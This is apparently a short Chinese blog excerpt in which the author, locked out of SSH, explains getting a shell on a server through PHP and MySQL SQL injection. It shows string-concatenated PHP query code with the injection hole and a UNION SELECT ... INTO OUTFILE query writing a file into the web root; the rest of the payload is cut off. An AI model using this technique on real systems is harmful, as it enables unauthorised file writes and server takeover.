因某服务器ssh连不上去了,遂萌发通过漏洞来拿取shell,进而备份资料的想法。进过尝试,总结出以下通过PHP + MYSQL 注入攻击拿SHELL的方法

原始PHP代码

$sql = “SELECT thevalue FROM xxx WHERE thekey=’”.$key.”’ LIMIT 3″;

注入的SQL组合完整的样子

SELECT thevalue FROM xxx WHERE thekey=” UNION SELECT ‘dyf’  INTO OUTFILE ‘/var/www/dyf.txt’#’ LIMIT 3

注入内容

 ...... 

查看完整文章